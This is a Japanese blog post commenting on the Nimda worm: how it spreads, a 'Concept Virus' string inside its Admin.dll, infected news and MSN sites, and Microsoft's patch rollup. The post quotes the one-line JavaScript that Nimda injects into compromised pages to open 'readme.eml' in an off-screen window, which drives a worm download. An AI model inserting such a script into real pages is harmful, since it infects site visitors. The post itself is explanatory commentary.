ニュースサイトから感染サイトをピックアップしようと思ったけど，挫折(^_^;)。ほとほとあきれるほどの，感染力に稲穂も垂れるワームかな。

　最近流行ったワームをミキサーにかけるとニムダになる。FBIがコード・レッドによってアクセス速度が遅くなるかもと発表したときは笑った人もいたが，ニムダが広まって笑えた人は誰もいなかった。ニムダは「やればできる」ことを証明した「コンセプト実証型」ワームだ。ネット上を動き回ってウェブサイトを密かに書き換え，そのページにアクセスしたユーザーに感染し，自動的にそのユーザーのマシンをワーム配信マシンにする。添付ファイルを開かなければ大丈夫，ではない。ニムダの作者は，何通りもの方法でウイルスを広げることが可能だと証明したのだ。

　記事の「コンセプト実証型」と云うのは，実際にニムダ（取扱注意）の「Admin.dll」をテキスト・エディタで開いて34段落目の，
「 SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces と云う表記をみれば明らかだ。「Concept Virus(CV)」（コンセプト・ウイルス，新種の行動を持つものなど，これまでにない行動力の実証性を確かめるために作成されるウイルス）という記述がある。

　それにしても凄まじい感染力。国内の報道で名前が出ているものだけでも感染リストにまとめた。感染の報告をしているリンクを読んでいくだけで面白いが，まぁサイトを書き換えられたところはワーム配布サイトとなったわけで，なんともおめでたいこってす。実際に感染しているサイトに行ってみると，HTMLではたった1行追加になっているだけ。
「 <html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html> 」
という1行。これによりemlファイルがJavaScripsによって自動的にダウンロードされ，IEのバージョンによっては自動的に感染する。パッチを出している元のはずのMSNが感染するなど言語道断なわけだが（過去記事），まぁとは云っても，IISの修正パッチをDLしようとすると，68個もの穴をふさぐセキュリティ・ロールアップ・パッケージという，束になったパッチをあてることになるわけで，なんともかんとも。本来ワームにサーバーが侵されるなど管理者のメンツを損なうものだが，まぁもともとMS製品なので，なんともかんとも（←なんだよ。（今も感染している一例のサイト，放置されてるっぽいので当分このままでしょう。←JavaScripsオンの場合，ファイルのDLが始まる。IEのバージョンによってはそれだけで感染するので注意←修正されました(^_^;)）